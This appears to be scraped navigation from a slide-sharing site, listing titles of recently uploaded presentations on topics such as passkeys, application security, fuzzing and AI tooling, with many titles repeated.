Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfSAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
Peter Spielvogel
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
RinaMondal9
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
James Anderson
 

Recently uploaded (20)

UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfSAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
 

PT_OWASP_AUSTIN_2017